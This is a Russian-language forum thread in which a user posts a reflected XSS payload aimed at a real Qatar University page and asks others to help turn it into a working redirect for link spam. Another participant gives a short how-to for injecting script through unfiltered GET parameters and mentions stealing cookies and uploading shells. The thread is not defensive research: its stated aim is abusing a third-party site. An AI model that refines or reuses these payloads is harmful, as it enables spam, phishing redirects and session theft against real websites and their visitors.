Один интересный редирект

[justhelen]

Привет, я тут нашла одну интересную штуку, но не могу сообразить, как сделать через неё редирект. Может кто-нибудь догадается, у вас тогда тоже будет редирект через .эду домен Ну а я буду знать, что можно попробовать сделать и с другими такими редиректами.

http://www.qu.edu.qa/tools/email.php?url="><img src=x onerror=window.location.replace(/http://site.com/);>

Проблема в том, что с "http://" не работает, видимо где-то его вырезает в скрипте. А без "http://" конечно не редиректит, потому что считает, что это редирект на какую-то страницу на своём же сайте, а потому выдаёт 404.

"http:////", "http:\\\\", "http:\/\/" уже пробовала, не работает. Может вы догадаетесь

 

[Mikhail B.]

Ну не работает он. В чем именно нужно разобраться, в браузер вставил не работает, в вк вставил тоже не работает.

 

[justhelen]

Ну не работает он. В чем именно нужно разобраться, в браузер вставил не работает, в вк вставил тоже не работает.

Блин Ну так он не работает, потому что нужно понять, как туда вставить скрипт. Это уязвимость на сайте, которая позволяет делать редирект. вот в этом месте я вставляю скрипт:

onerror=window.location.replace(/http://site.com/);

В таком виде да, не работает. Может можно как-то по-другому. Может где-то "/" доставить, может какой-то другой скрипт для редиректа, который туда подошёл бы (хотя я не представляю, но я и JS знаю плохо, у меня базовые знания).

 

[Mikhail B.]

А для чего? Если для спама, бот увидит просто "location.replace" и все поймет. куда круче (выглядят!) обфусцированные js редиректы, прикольная штука. Но не стал замораживаться по ней.
На будущее, темы где че-то палить хочешь, надо в скрытом создавать.

 

[justhelen]

А для чего? Если для спама, бот увидит просто "location.replace" и все поймет. куда круче (выглядят!) обфусцированные js редиректы, прикольная штука. Но не стал замораживаться по ней.

Как показывает практика, если в ссылке location.replace, то никто ничего не палит В самой ссылке когда. Вот если бы это было на целевой странице в коде, тогда да, тогда палит. Ты наверное не так понял что-то. Обфусцированный редирект - это в коде страницы когда, я обычно так и делаю. А это ссылка. Чтоб её постить на сайт, это не в коде страницы, на которую будет ссылка.

На будущее темы где че-то палить хочешь надо в скрытом создавать.

То ещё палево Один такой редирект. Я знаю, где их взять десятки, если не больше.

 

[justhelen]

Если кто-нибудь ещё думает, что это палево, можете мне в личку написать, если догадались, как сделать Я тогда тут говорить не буду. Хотя я это не считаю каким-то суперпалевом прямо.

 

[alekwuy]

тебе не на этот фрум
ище где люди шарят xss делать
там тебе и помогут

еще проблема в том что хром просто не пустит юзера по такой ссылке

 

[justhelen]

тебе не на этот фрум
ище где люди шарят xss делать
там тебе и помогут

еще проблема в том что хром просто не пустит юзера по такой ссылке

Да мне не кажется, что тут совсем никто не шарит. Тем более, я думаю, что тут его легко сделать, просто я не догадалась. Про хром я знаю, но во-первых мне интересен сам принцип (не только в этом редиректе именно такое видела), поэтому просто стало интересно, как же сделать. В этом случае хром понимает и не пускает, в каком-то другом будет чуть отличаться редирект, может хром и пустит. А во-вторых есть же не только хром , вот ФФ пускает.

Кстати, ты первый человек, который вообще понял, что речь про xss

 

[alekwuy]

отличаться редирект, может хром и пустит

не пустит, он сам алерт увидел и все
это бесполезно)

 

[justhelen]

не пустит, он сам алерт увидел и все
это бесполезно)

У меня пускал иногда когда я пробовала другие редиректы с xss. Не распознаёт некоторые

 

[ol1ver]

читайте за xss, вам правильно подсказали. Он где угодно может быть, хоть в post/get/cookies

зы. Это не только редиректы, через него можно даже post запросы слать (ага, с токеном), даже на заливку payload'a, даже админу
ну и cookies угонять.

НО Я ВАМ НЕ СОВЕТУЮ ЭТО ДЕЛАТЬ.

 

[alekwuy]

У меня пускал иногда когда я пробовала другие редиректы с xss. Не распознаёт некоторые

какие например?

 

[justhelen]

какие например?

Слушай, я их юзала давно, потом пропала необходимость т.к. там, где я их постила, они всё равно банились (вообще любые ссылки банились). Ты думаешь, я помню, какой редирект работал несколько месяцев назад? Но помню точно, что были некоторые с xss, которые работали в хроме. Можешь не верить

 

[justhelen]

читайте за xss, вам правильно подсказали. Он где угодно может быть, хоть в post/get/cookies

зы. Это не только редиректы, через него можно даже post запросы слать (ага, с токеном), даже на заливку payload'a, даже админу
ну и cookies угонять.

НО Я ВАМ НЕ СОВЕТУЮ ЭТО ДЕЛАТЬ.

Я знаю Т.е. я не делала такое, мне было не надо, вот я и не изучала, но вообще много чего можно сделать. Просто мне сейчас было интересно именно редирект сделать.

 

[alekwuy]

Слушай, я их юзала давно, потом пропала необходимость т.к. там, где я их постила, они всё равно банились (вообще любые ссылки банились). Ты думаешь, я помню, какой редирект работал несколько месяцев назад? Но помню точно, что были некоторые с xss, которые работали в хроме. Можешь не верить

я женщинам не верю

 

[justhelen]

я женщинам не верю

Ок Да вообще от женщин одни беды, ты лучше к ним не подходи даже

 

[ol1ver]

Я знаю Т.е. я не делала такое, мне было не надо, вот я и не изучала, но вообще много чего можно сделать. Просто мне сейчас было интересно именно редирект сделать.

ну ищите сайты где не фильтруется get/post (в приоритете get), и скрипт выводит эту get/post переменную (соответственно не фильтруя). Ищите в исходном коде.

например url: ?order_id=666

а в исходном коде <title> Your order #666 </title>
получается вставляем payload - </title><script>alert('xss');</script><!--

Не забывайте что < ' и тп могут тоже экранироваться. Можно еще так <script scr=url></script>

Вангую след. топик - что значит ошибка You have an error in your SQL syntax;
Ну а там - как залить шелл

 

[capturis]

Ну а там - как залить шелл

Ага. А потом "прислали повестку, как быть, чего говорить?"
"Свалил в тайгу, как сделать усилитель радио-сигнала? Инет не ловит."

 

[justhelen]

ну ищите сайты где не фильтруется get/post (в приоритете get), и скрипт выводит эту get/post переменную (соответственно не фильтруя). Ищите в исходном коде.

например url: ?order_id=666

а в исходном коде <title> Your order #666 </title>
получается вставляем payload - </title><script>alert('xss');</script><!--

Не забывайте что < ' и тп могут тоже экранироваться. Можно еще так <script scr=url></script>

Прямо мануал Я вообще не то что бы сильно этим всем интересуюсь, я только для редиректов использовала Но после таких ответов интерес растёт конечно

Вангую след. топик - что значит ошибка You have an error in your SQL syntax;

Нет, такого топика не будет, я знаю SQL, не будет синтаксических ошибок там если что

Ну а там - как залить шелл

Не надо расстраиваться

 

[justhelen]

Кстати, ребят, мне уже помогли с редиректом Один очень умный человек догадался, как сделать Так что, в принципе можно закрывать топик.

(Сделанным редиректом не поделюсь )

 

[alekwuy]

Кстати, ребят, мне уже помогли с редиректом Один очень умный человек догадался, как сделать Так что, в принципе можно закрывать топик.

(Сделанным редиректом не поделюсь )

а могла бы и поделится со мной)
дай мне контакты, мне прям интересно)

 

[alekwuy]

а хром пускает?

 

[Sanekk]

Кстати, ребят, мне уже помогли с редиректом Один очень умный человек догадался, как сделать Так что, в принципе можно закрывать топик.

(Сделанным редиректом не поделюсь )

как будто это поможет,щас в лс начнут ломиться

 

[DmitryAk]

как будто это поможет,щас в лс начнут ломиться

У неё полфорума в игноре - добавится еще часть))

 

[justhelen]

а хром пускает?

Не пускает Да и без разницы, меня сам принцип интересовал, что можно в тот скрипт засунуть, чтобы он работал.

а могла бы и поделится со мной)
дай мне контакты, мне прям интересно)

Так женщины же вообще плохие, ни с кем не делятся

как будто это поможет,щас в лс начнут ломиться

Ну, ты после другой моей темы наверное знаешь, как быстро можно попасть в игнор Так что, если будут ломиться, у меня есть быстрое решение

 

[alekwuy]

Так женщины же вообще плохие, ни с кем не делятся

Ой, всё!

 

[justhelen]

Ой, всё!

Я тебя сделала Я знала, что ты проиграешь